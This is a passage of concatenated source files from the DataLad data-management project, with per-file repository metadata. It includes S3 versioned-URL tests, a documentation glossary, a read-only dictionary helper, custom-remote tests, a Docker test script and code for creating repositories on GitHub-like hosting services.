ana.clone(source=aligned.path, path=opj('src', 'aligned'), reckless=True)\n ana.clone(source=tnt.path, path=opj('src', 'tnt'), reckless=True)\n # link to metaanalysis\n metaanalysis.clone(source=ana.path, path=opj('src', 'ana{}'.format(i)),\n reckless=True)\n # simulate change in an input (but not raw) dataset\n create_tree(\n aligned.path,\n 
{'modification{}.txt'.format(i): 'unique{}'.format(i)})\n aligned.save('.')\n # finally aggregate data\n aggregate = public.create('aggregate', description='aggregate data')\n aggregate.clone(source=aligned.path, path=opj('src', 'aligned'), reckless=True)\n # the toplevel dataset is intentionally left dirty, to reflect the\n # most likely condition for the joint dataset to be in at any given\n # point in time\n" }, { "alpha_fraction": 0.6148208379745483, "alphanum_fraction": 0.6319218277931213, "avg_line_length": 41.344825744628906, "blob_id": "179d35dc6a6aea9705e9d17059156e4d886fa45e", "content_id": "dbe05ad0541ec4ad2bbaffb6c5ad02d735c9ec4b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4912, "license_type": "permissive", "max_line_length": 120, "num_lines": 116, "path": "/datalad/tests/test_s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test S3 supporting functionality\n\n\"\"\"\n\nfrom datalad.downloaders.tests.utils import get_test_providers\nfrom datalad.support.network import URL\nfrom datalad.support.s3 import (\n add_version_to_url,\n get_versioned_url,\n)\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n eq_,\n ok_startswith,\n skip_if_no_network,\n use_cassette,\n)\n\n\ndef test_add_version_to_url():\n base_url = \"http://ex.com/f.txt\"\n base_url_query = \"http://ex.com/f.txt?k=v\"\n for replace in True, False:\n eq_(add_version_to_url(URL(base_url), \"new.id\", replace=replace),\n base_url + \"?versionId=new.id\")\n\n eq_(add_version_to_url(URL(base_url_query),\n \"new.id\", replace=replace),\n base_url_query + \"&versionId=new.id\")\n\n expected = \"new.id\" if replace else \"orig.id\"\n eq_(add_version_to_url(URL(base_url + \"?versionId=orig.id\"),\n \"new.id\",\n replace=replace),\n base_url + \"?versionId=\" + expected)\n\n eq_(add_version_to_url(URL(base_url_query + \"&versionId=orig.id\"),\n \"new.id\",\n replace=replace),\n base_url_query + \"&versionId=\" + expected)\n\n\n@skip_if_no_network\n@use_cassette('s3_test_version_url')\ndef test_get_versioned_url():\n get_test_providers('s3://openfmri/tarballs') # to verify having credentials to access openfmri via S3\n for url_pref in ('http://openfmri.s3.amazonaws.com', 'https://s3.amazonaws.com/openfmri'):\n eq_(get_versioned_url(url_pref + \"/tarballs/ds001_raw.tgz\"),\n url_pref + \"/tarballs/ds001_raw.tgz?versionId=null\")\n\n eq_(get_versioned_url(url_pref + \"/tarballs/ds001_raw.tgz?param=1\"),\n url_pref + \"/tarballs/ds001_raw.tgz?param=1&versionId=null\")\n\n # We don't duplicate the version if it already exists.\n eq_(get_versioned_url(url_pref + \"/tarballs/ds001_raw.tgz?versionId=null\"),\n url_pref + \"/tarballs/ds001_raw.tgz?versionId=null\")\n\n # something is wrong there\n #print(get_versioned_url(\"http://openfmri.s3.amazonaws.com/ds001/demographics.txt\"))\n\n eq_(get_versioned_url(\"someurl\"), \"someurl\") # should just return original one\n assert_raises(RuntimeError, get_versioned_url, \"someurl\", guarantee_versioned=True)\n\n # TODO: on a bucket without versioning\n url = 
\"http://datalad-test0-nonversioned.s3.amazonaws.com/2versions-removed-recreated.txt\"\n eq_(get_versioned_url(url), url)\n eq_(get_versioned_url(url, return_all=True), [url])\n\n assert_raises(NotImplementedError, get_versioned_url, \"s3://buga\")\n\n urls = get_versioned_url(\"http://datalad-test0-versioned.s3.amazonaws.com/2versions-removed-recreated.txt\",\n return_all=True, verify=True)\n eq_(len(set(urls)), len(urls)) # all unique\n for url in urls:\n # so we didn't grab other files along with the same prefix\n ok_startswith(url, 'http://datalad-test0-versioned.s3.amazonaws.com/2versions-removed-recreated.txt?versionId=')\n\n # Update a versioned URL with a newer version tag.\n url_3ver = \"http://datalad-test0-versioned.s3.amazonaws.com/3versions-allversioned.txt\"\n url_3ver_input = url_3ver + \"?versionId=b.qCuh7Sg58VIYj8TVHzbRS97EvejzEl\"\n eq_(get_versioned_url(url_3ver_input), url_3ver_input)\n eq_(get_versioned_url(url_3ver_input, update=True),\n url_3ver + \"?versionId=Kvuind11HZh._dCPaDAb0OY9dRrQoTMn\")\n\n\n@skip_if_no_network\n@use_cassette('s3_test_version_url_anon')\ndef test_get_versioned_url_anon():\n # The one without any authenticator, was crashing.\n # Also it triggered another bug about having . in the bucket name\n url_on = \"http://dandiarchive.s3.amazonaws.com/ros3test.nwb\"\n url_on_versioned = get_versioned_url(url_on)\n ok_startswith(url_on_versioned, url_on + \"?versionId=\")\n\n\n@skip_if_no_network\n@use_cassette('s3_test_version_url_deleted')\ndef test_version_url_deleted():\n get_test_providers('s3://datalad-test0-versioned/', reload=True) # to verify having credentials to access\n # openfmri via S3\n # it existed and then was removed\n fpath = \"1version-removed.txt\"\n url = \"http://datalad-test0-versioned.s3.amazonaws.com/%s\" % fpath\n turl = \"http://datalad-test0-versioned.s3.amazonaws.com/%s\" \\\n \"?versionId=eZ5Hgwo8azfBv3QT7aW9dmm2sbLUY.QP\" % fpath\n eq_(get_versioned_url(url), turl)\n # too heavy for verification!\n #eq_(get_versioned_url(url, verify=True), turl)\n" }, { "alpha_fraction": 0.6749491095542908, "alphanum_fraction": 0.6806517243385315, "avg_line_length": 38.6129035949707, "blob_id": "08863e6154dd8d2fe029e53646a96305739ef1ff", "content_id": "fa65fa11b1a2d4ee1adc0f27f6be694108e1a004", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2457, "license_type": "permissive", "max_line_length": 120, "num_lines": 62, "path": "/docs/source/glossary.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst; fill-column: 78; indent-tabs-mode: nil -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n #\n # See COPYING file distributed along with the datalad package for the\n # copyright and license terms.\n #\n ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n\n.. _chap_glossary:\n\n********\nGlossary\n********\n\nDataLad purposefully uses a terminology that is different from the one used by\nits technological foundations Git_ and git-annex_. This glossary provides\ndefinitions for terms used in the datalad documentation and API, and relates\nthem to the corresponding Git_/git-annex_ concepts.\n\n.. glossary::\n :sorted:\n\n dataset\n A regular Git_ repository with an (optional) :term:`annex`.\n\n subdataset\n A :term:`dataset` that is part of another dataset, by means of being\n tracked as a Git_ submodule. 
As such, a subdataset is also a complete\n dataset and not different from a standalone dataset.\n\n superdataset\n A :term:`dataset` that contains at least one :term:`subdataset`.\n\n sibling\n A :term:`dataset` (location) that is related to a particular dataset,\n by sharing content and history. In Git_ terminology, this is a *clone*\n of a dataset that is configured as a *remote*.\n\n annex\n Extension to a Git_ repository, provided and managed by git-annex_ as\n means to track and distribute large (and small) files without having to\n inject them directly into a Git_ repository (which would slow Git\n operations significantly and impair handling of such repositories in\n general).\n\n CLI\n A `Command Line Interface`_. Could be used interactively by executing\n commands in a `shell`_, or as a programmable API for shell scripts.\n\n DataLad extension\n A Python package, developed outside of the core DataLad codebase, which\n (when installed) typically either provides additional top level `datalad`\n commands and/or additional metadata extractors. Visit\n `Handbook, Ch.2. DataLad’s extensions <http://handbook.datalad.org/en/latest/basics/101-144-intro_extensions.html>`_\n for a representative list of extensions and instructions on how to install\n them.\n\n.. _Git: https://git-scm.com\n.. _Git-annex: http://git-annex.branchable.com\n.. _`Command Line Interface`: https://en.wikipedia.org/wiki/Command-line_interface\n.. _shell: https://en.wikipedia.org/wiki/Shell_(computing)" }, { "alpha_fraction": 0.560628354549408, "alphanum_fraction": 0.5650466084480286, "avg_line_length": 29.402984619140625, "blob_id": "0624d264d6920b72e33210e2ab70b9b1276235b5", "content_id": "5269a2653722ec81ecc1b3df2c28536f6aa8b041", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2037, "license_type": "permissive", "max_line_length": 87, "num_lines": 67, "path": "/datalad/support/collections.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Auxiliary data structures\"\"\"\n\nfrom typing import Mapping\n\n\nclass ReadOnlyDict(Mapping):\n # Taken from https://github.com/slezica/python-frozendict\n # License: MIT\n \"\"\"\n An immutable wrapper around dictionaries that implements the complete\n :py:class:`collections.Mapping` interface. 
It can be used as a drop-in\n replacement for dictionaries where immutability is desired.\n \"\"\"\n dict_cls = dict\n\n def __init__(self, *args, **kwargs):\n self._dict = self.dict_cls(*args, **kwargs)\n self._hash = None\n\n def __getitem__(self, key):\n return self._dict[key]\n\n def __contains__(self, key):\n return key in self._dict\n\n def copy(self, **add_or_replace):\n return self.__class__(self, **add_or_replace)\n\n def __iter__(self):\n return iter(self._dict)\n\n def __len__(self):\n return len(self._dict)\n\n def __repr__(self):\n return '<%s %r>' % (self.__class__.__name__, self._dict)\n\n def __hash__(self):\n if self._hash is None:\n h = 0\n for key, value in self._dict.items():\n h ^= hash((key, _val2hashable(value)))\n self._hash = h\n return self._hash\n\n\ndef _val2hashable(val):\n \"\"\"Small helper to convert incoming mutables to something hashable\n\n The goal is to be able to put the return value into a set, while\n avoiding conversions that would result in a change of representation\n in a subsequent JSON string.\n \"\"\"\n if isinstance(val, dict):\n return ReadOnlyDict(val)\n elif isinstance(val, list):\n return tuple(map(_val2hashable, val))\n else:\n return val\n" }, { "alpha_fraction": 0.6517778635025024, "alphanum_fraction": 0.6691154837608337, "avg_line_length": 36.39560317993164, "blob_id": "3c2af6ebe7cb9952e6143b3c2127926e71c88723", "content_id": "fac347aec834528e22453f13ccc0a7f07b5e3cc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3403, "license_type": "permissive", "max_line_length": 89, "num_lines": 91, "path": "/datalad/customremotes/tests/test_datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the universal datalad's annex customremote\"\"\"\n\nimport glob\nimport logging\nimport os.path as op\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.downloaders.tests.utils import get_test_providers\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n eq_,\n serve_path_via_http,\n skip_if_no_network,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\n\n\n@with_tempfile()\n@skip_if_no_network\ndef check_basic_scenario(url, d=None):\n ds = Dataset(d).create()\n annex = ds.repo\n\n # TODO skip if no boto or no credentials\n get_test_providers(url) # so to skip if unknown creds\n\n # Let's try to add some file which we should have access to\n ds.download_url(url)\n ds.save()\n\n # git-annex got a fix where it stopped replacing - in the middle of the filename\n # Let's cater to the developers who might have some intermediate version and not\n # easy to compare -- we will just check that only one file there is an that it\n # matches what we expect when outside of the development versions range:\n filenames = glob.glob(op.join(d, '3versions[-_]allversioned.txt'))\n eq_(len(filenames), 1)\n filename = op.basename(filenames[0])\n # Date after the fix in 8.20200501-53-gcabbc91b1 - must have '-'\n if 
external_versions['cmd:annex'] >= '8.20200512':\n assert_in('-', filename)\n else:\n # either one is ok\n assert '_' in filename or '-' in filename\n\n whereis1 = annex.whereis(filename, output='full')\n eq_(len(whereis1), 2) # here and datalad\n annex.drop(filename)\n\n whereis2 = annex.whereis(filename, output='full')\n eq_(len(whereis2), 1) # datalad\n\n # make sure that there are no \"hidden\" error messages, despite the\n # whereis command succeeding\n # https://github.com/datalad/datalad/issues/6453#issuecomment-1047533276\n from datalad.runner import StdOutErrCapture\n\n # we need to swallow logs since if DATALAD_LOG_LEVEL is set low, we\n # would get all the git-annex debug output in stderr\n with swallow_logs(new_level=logging.INFO) as cml:\n out = annex._call_annex(['whereis'], protocol=StdOutErrCapture)\n eq_(out['stderr'].strip(), '')\n\n # if we provide some bogus address which we can't access, we shouldn't pollute output\n with assert_raises(CommandError) as cme:\n annex.add_url_to_file('bogus', url + '_bogus')\n assert_in('addurl: 1 failed', cme.value.stderr)\n\n\n# unfortunately with_tree etc decorators aren't generators friendly thus\n# this little adapters to test both on local and s3 urls\n@with_tree(tree={'3versions-allversioned.txt': \"somefile\"})\n@serve_path_via_http\ndef test_basic_scenario_local_url(p=None, local_url=None):\n check_basic_scenario(\"%s3versions-allversioned.txt\" % local_url)\n\n\ndef test_basic_scenario_s3():\n check_basic_scenario('s3://datalad-test0-versioned/3versions-allversioned.txt')\n" }, { "alpha_fraction": 0.5934369564056396, "alphanum_fraction": 0.5968911647796631, "avg_line_length": 36.11538314819336, "blob_id": "bce82af43468c9d841318d7f476af657e7d43c4c", "content_id": "7d1dd36754d72fcc96423ef10bd550e007545e1d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2895, "license_type": "permissive", "max_line_length": 99, "num_lines": 78, "path": "/datalad/api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Python DataLad API exposing user-oriented commands (also available via CLI)\"\"\"\n\nimport datalad\nfrom datalad.coreapi import *\n\n\ndef _command_summary():\n # Import here to avoid polluting the datalad.api namespace.\n from collections import defaultdict\n from datalad.interface.base import alter_interface_docs_for_api\n from datalad.interface.base import get_api_name\n from datalad.interface.base import get_cmd_doc\n from datalad.interface.base import get_cmd_summaries\n from datalad.interface.base import get_interface_groups\n from datalad.interface.base import load_interface\n\n groups = get_interface_groups()\n grp_short_descriptions = defaultdict(list)\n for group, _, specs in sorted(groups, key=lambda x: x[1]):\n for spec in specs:\n intf = load_interface(spec)\n if intf is None:\n continue\n sdescr = getattr(intf, \"short_description\", None) or \\\n alter_interface_docs_for_api(get_cmd_doc(intf)).split(\"\\n\")[0]\n grp_short_descriptions[group].append(\n (get_api_name(spec), sdescr))\n return 
\"\\n\".join(get_cmd_summaries(grp_short_descriptions, groups))\n\n\nif not datalad.in_librarymode():\n __doc__ += \"\\n\\n{}\".format(_command_summary())\n\n\ndef _generate_extension_api():\n \"\"\"Auto detect all available extensions and generate an API from them\n \"\"\"\n from datalad.support.entrypoints import iter_entrypoints\n from datalad.interface.base import (\n get_api_name,\n load_interface,\n )\n\n import logging\n lgr = logging.getLogger('datalad.api')\n\n for ename, _, (grp_descr, interfaces) in iter_entrypoints(\n 'datalad.extensions', load=True):\n for intfspec in interfaces:\n # turn the interface spec into an instance\n intf = load_interface(intfspec[:2])\n if intf is None:\n lgr.error(\n \"Skipping unusable command interface '%s.%s' from extension %r\",\n intfspec[0], intfspec[1], ename)\n continue\n api_name = get_api_name(intfspec)\n if api_name in globals():\n lgr.debug(\n 'Command %s from extension %s is replacing a previously loaded implementation',\n api_name,\n ename)\n globals()[api_name] = intf.__call__\n\n\n_generate_extension_api()\n\n# Be nice and clean up the namespace properly\ndel _generate_extension_api\ndel _command_summary\n" }, { "alpha_fraction": 0.5802277326583862, "alphanum_fraction": 0.5859213471412659, "avg_line_length": 31.200000762939453, "blob_id": "a17d1ea1bcf579b040827c833becd7d0a45c718f", "content_id": "65f58241679da930332a8845d0f637974cf643d0", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1932, "license_type": "permissive", "max_line_length": 89, "num_lines": 60, "path": "/tools/testing/test_README_in_docker", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#emacs: -*- mode: shell-script; c-basic-offset: 4; tab-width: 4; indent-tabs-mode: t -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# Helper to generate a Docker instance mapping user uder docker into your USER/UID/GID\n# and allowing to run tox within that clean automatically generated according to\n# README.md's apt-get lines environment\n#\nset -e\n#set -x\nset -u\n\nDL_DIST=$1\n\ntopdir=$(realpath `dirname $0`)\ndockerfile=$topdir/test_README_in_docker-Dockerfile\n# echo \"D: $DL_APT\"\nsed -e \"s,DL_DIST,$DL_DIST,g\" \\\n -e \"s,DL_USER,$USER,g\" \\\n -e \"s,DL_UID,`id -u`,g\" \\\n -e \"s,DL_GID,`id -g`,g\" \\\n -e \"s,DL_GIT_USER_EMAIL,`git config --get user.email`,g\" \\\n -e \"s,DL_GIT_USER_NAME,`git config --get user.name`,g\" \\\n $dockerfile.in >| $dockerfile\n\n#DL_APT=$(grep '^\\(apt-get\\|pip\\)' ./../../README.md)\n\ngrep '^apt-get ' ./../../README.md | sed -e 's|python-{|python{,3}-{|g' \\\n| while read aptline; do\n sed -i -e \"s|\\(\\(.*\\)DL_APT\\(.*\\)\\)|\\2$aptline\\3\\n\\1|g\" $dockerfile\n :\ndone\nsed -e '/DL_APT/d' -i $dockerfile\n\ntag=datalad:test_README_${USER}_$DL_DIST\necho \"I: tag $tag\"\nif docker images | grep -q datalad.*test_README.*$DL_DIST; then\n echo \"I: tag already exists -- skipping rebuilding\"\nelse\n docker build -t $tag -f $dockerfile . #&& rm Dockerfile\n #docker build --no-cache=True -t $tag -f $dockerfile . 
#&& rm Dockerfile\nfi\n\ntopgitdir=`realpath ${topdir}/../..`\necho \"I: top git dir $topgitdir\"\n\ntox=\"$topgitdir/.tox\"\nif [ -e \"$tox\" ]; then\n echo \"I: removing existing tox under $tox\"\n rm -r $tox\nfi\n\necho \"I: running tox within docker\"\ndocker run -it --rm=true -v $topgitdir:/home/$USER/datalad $tag tox --sitepackages\n" }, { "alpha_fraction": 0.5500243306159973, "alphanum_fraction": 0.5505512952804565, "avg_line_length": 34.854652404785156, "blob_id": "7904e333a98af2572b22bcebc9756b98d1e18970", "content_id": "aa3ebb5af9f2d84e4887bee0b090ad23f2624066", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24668, "license_type": "permissive", "max_line_length": 166, "num_lines": 688, "path": "/datalad/distributed/create_sibling_ghlike.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tooling for creating a publication target on GitHub-like systems\n\"\"\"\n\nimport logging\nimport re\nfrom urllib.parse import (\n urljoin,\n urlparse,\n)\n\nimport requests\n\nfrom datalad import cfg as dlcfg\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n require_dataset,\n)\nfrom datalad.downloaders.credentials import Token\nfrom datalad.downloaders.http import DEFAULT_USER_AGENT\nfrom datalad.interface.common_opts import (\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.ui import ui\nfrom datalad.utils import todo_interface_for_extensions\n\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_ghlike')\n\n\nclass _GitHubLike(object):\n \"\"\"Helper class with a platform abstraction for GitHub-like services\n \"\"\"\n # (short) lower-case name of the target platform\n name = None\n # (longer) name with fancy capitalization\n fullname = None\n # all API endpoint without base URL!\n # to create a repo in an organization\n create_org_repo_endpoint = None\n # to create a repo under the authenticated user\n create_user_repo_endpoint = None\n # query for props of the authenticated users\n get_authenticated_user_endpoint = None\n # query for repository properties\n get_repo_info_endpoint = None\n # HTTP response codes for particular events\n # repo created successfully\n response_code_repo_created = requests.codes.created\n # auth failure\n response_code_unauthorized = requests.codes.forbidden\n\n # extra config settings to be used for a remote pointing to the\n # target platform\n extra_remote_settings = {}\n\n # to be used (in modified form) by create_sibling_*() commands that\n # utilize this platform abstraction\n create_sibling_params = dict(\n dataset=Parameter(\n args=(\"--dataset\", \"-d\",),\n doc=\"\"\"dataset to create the publication target for. 
If not given,\n an attempt is made to identify the dataset based on the current\n working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n reponame=Parameter(\n args=('reponame',),\n metavar='[<org-name>/]<repo-(base)name>',\n doc=\"\"\"repository name, optionally including an '<organization>/'\n prefix if the repository shall not reside under a user's namespace.\n When operating recursively, a suffix will be appended to this name\n for each subdataset\"\"\",\n constraints=EnsureStr()),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"name of the sibling in the local dataset installation\n (remote name)\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice(\n 'skip', 'error', 'reconfigure'),\n doc=\"\"\"behavior when already existing or configured\n siblings are discovered: skip the dataset ('skip'), update the\n configuration ('reconfigure'), or fail ('error').\"\"\",),\n credential=Parameter(\n args=('--credential',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='NAME',\n doc=\"\"\"name of the credential providing a personal access token\n to be used for authorization. The token can be supplied via\n configuration setting 'datalad.credential.<name>.token', or\n environment variable DATALAD_CREDENTIAL_<NAME>_TOKEN, or will\n be queried from the active credential store using the provided\n name. If none is provided, the host-part of the API URL is used\n as a name (e.g. 'https://api.github.com' -> 'api.github.com')\"\"\"),\n api=Parameter(\n args=('--api',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='URL',\n # TODO consider default instance via config\n doc=\"\"\"API endpoint of the Git hosting service instance\"\"\"),\n access_protocol=Parameter(\n args=(\"--access-protocol\",),\n constraints=EnsureChoice('https', 'ssh', 'https-ssh'),\n doc=\"\"\"access protocol/URL to configure for the sibling. With\n 'https-ssh' SSH will be used for write access, whereas HTTPS\n is used for read access.\"\"\"),\n description=Parameter(\n args=(\"--description\",),\n doc=\"\"\"Brief description, displayed on the project's page\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n publish_depends=publish_depends,\n private=Parameter(\n args=(\"--private\",),\n action=\"store_true\",\n default=False,\n doc=\"\"\"if set, create a private repository\"\"\"),\n dry_run=Parameter(\n args=(\"--dry-run\",),\n action=\"store_true\",\n doc=\"\"\"if set, no repository will be created, only tests for\n sibling name collisions will be performed, and would-be repository\n names are reported for all relevant datasets\"\"\"),\n )\n\n def __init__(self, url, credential, require_token=True, token_info=None):\n if self.name is None or self.fullname is None:\n raise NotImplementedError(\n 'GitHub-like platform must have name and fullname properties')\n if not url:\n raise ValueError(f'API URL required for {self.fullname}')\n\n self.api_url = url\n self._user_info = None\n self._set_request_headers(\n credential,\n f'An access token is required for {url}' \\\n + f'. 
{token_info}' if token_info else '',\n require_token,\n )\n self._set_extra_remote_settings()\n\n def _set_extra_remote_settings(self):\n target_name = urlparse(self.api_url).netloc\n config_section = \"datalad.create-sibling-ghlike.extra-remote-settings.{}\".format(target_name)\n target_specific_settings = {\n option: dlcfg.get_value(config_section, option)\n for option in dlcfg.options(config_section)\n }\n self.extra_remote_settings = {\n **self.extra_remote_settings,\n **target_specific_settings,\n }\n\n @todo_interface_for_extensions\n def _set_request_headers(self, credential_name, auth_info, require_token):\n if credential_name is None:\n credential_name = urlparse(self.api_url).netloc\n\n try:\n self.auth = Token(credential_name)(\n instructions=auth_info)['token']\n except Exception as e:\n lgr.debug('Token retrieval failed: %s', e)\n lgr.warning(\n 'Cannot determine authorization token for %s', credential_name)\n if require_token:\n raise ValueError(\n f'Authorization required for {self.fullname}, '\n f'cannot find token for a credential {credential_name}.')\n else:\n lgr.warning(\"No token found for credential '%s'\", credential_name)\n self.auth = 'NO-TOKEN-AVAILABLE'\n\n self.request_headers = {\n 'user-agent': DEFAULT_USER_AGENT,\n 'authorization': f'token {self.auth}',\n }\n\n @property\n def authenticated_user(self):\n \"\"\"Lazy query/reporting of properties for the authenticated user\n\n Returns\n -------\n dict\n \"\"\"\n if self._user_info:\n return self._user_info\n\n endpoint = urljoin(self.api_url, self.get_authenticated_user_endpoint)\n headers = self.request_headers\n r = requests.get(endpoint, headers=headers)\n # make sure any error-like situation causes noise\n r.raise_for_status()\n self._user_info = r.json()\n return self._user_info\n\n # TODO what are the actual constraints?\n def normalize_reponame(self, path):\n \"\"\"Turn name into a GitHub-like service compliant repository name\n\n Useful for sanitizing directory names.\n \"\"\"\n return re.sub(r'\\s+', '_', re.sub(r'[/\\\\]+', '-', path))\n\n def get_dataset_reponame_mapping(\n self, ds, name, reponame, existing, recursive, recursion_limit,\n res_kwargs):\n \"\"\"Discover all relevant datasets locally, and build remote repo names\n \"\"\"\n dss = _get_present_datasets(ds, recursive, recursion_limit)\n # check for existing remote configuration\n toprocess = []\n toyield = []\n for d in dss:\n if existing not in ('reconfigure', 'replace') and \\\n name in d.repo.get_remotes():\n toyield.append(get_status_dict(\n ds=d,\n status='error' if existing == 'error' else 'notneeded',\n message=('already has a configured sibling \"%s\"', name),\n **res_kwargs)\n )\n continue\n gh_reponame = reponame if d == ds else \\\n '{}-{}'.format(\n reponame,\n self.normalize_reponame(\n str(d.pathobj.relative_to(ds.pathobj))))\n toprocess.append((d, gh_reponame))\n return toprocess, toyield\n\n def get_siblingname(self, siblingname):\n \"\"\"Generate a (default) sibling name, if none is given\n\n Returns\n -------\n str\n \"\"\"\n if siblingname:\n return siblingname\n\n if self.api_url:\n siblingname = urlparse(self.api_url).netloc\n\n if not siblingname:\n raise ValueError(\n 'No valid sibling name given or determined: {}'.format(\n siblingname))\n\n return siblingname\n\n def create_repo(self, ds, reponame, organization, private, dry_run,\n description, existing):\n \"\"\"Create a repository on the target platform\n\n Returns\n -------\n dict\n Result record, with status='ok' when all is good, status='error'\n when 
unrecoverably broken, status='impossible' when recoverably\n broken\n\n Raises\n ------\n Exception\n Any unhandled condition (in particular unexpected non-success\n HTTP response codes) will raise an exception.\n \"\"\"\n res = self.repo_create_request(\n reponame, organization, private, dry_run, description)\n\n if res.get('status') == 'impossible' and res.get('preexisted'):\n # we cannot create, because there is something in the target\n # spot\n orguser = organization or self.authenticated_user['login']\n\n if existing == 'reconfigure':\n # we want to use the existing one instead\n # query properties, report, and be done\n repo_props = self.repo_get_request(orguser, reponame)\n res.update(\n status='notneeded',\n # return in full\n host_response=repo_props,\n # perform some normalization\n **self.normalize_repo_properties(repo_props)\n )\n elif existing == 'replace':\n # only implemented for backward compat with\n # create-sibling-github\n _msg = ('repository \"%s\" already exists', reponame)\n if ui.is_interactive:\n remove = ui.yesno(\n \"Do you really want to remove it?\",\n title=_msg[0] % _msg[1],\n default=False\n )\n else:\n return dict(\n res,\n status='impossible',\n message=(\n _msg[0] + \" Remove it manually first or \"\n \"rerun DataLad in an interactive shell \"\n \"to confirm this action.\",\n _msg[1]),\n )\n if not remove:\n return dict(\n res,\n status='impossible',\n message=_msg,\n )\n # remove the beast in cold blood\n self.repo_delete_request(\n organization or self.authenticated_user['login'],\n reponame)\n # try creating now\n return self.create_repo(\n ds, reponame, organization, private, dry_run,\n description, existing)\n\n # TODO intermediate error handling?\n\n return res\n\n def repo_get_request(self, orguser, reponame):\n \"\"\"Perform request to query for repo properties\n\n Returns\n -------\n dict\n The JSON payload of the response.\n \"\"\"\n # query information on the existing repo and use that\n # to complete the task\n r = requests.get(\n urljoin(\n self.api_url,\n self.get_repo_info_endpoint.format(\n user=orguser,\n repo=reponame)),\n headers=self.request_headers,\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n return r.json()\n\n def repo_delete_request(self, orguser, reponame):\n \"\"\"Perform request to delete a named repo on the platform\n\n Must be implemented in subclasses for particular target platforms.\n \"\"\"\n raise NotImplementedError\n\n def create_repos(self, dsrepo_map, 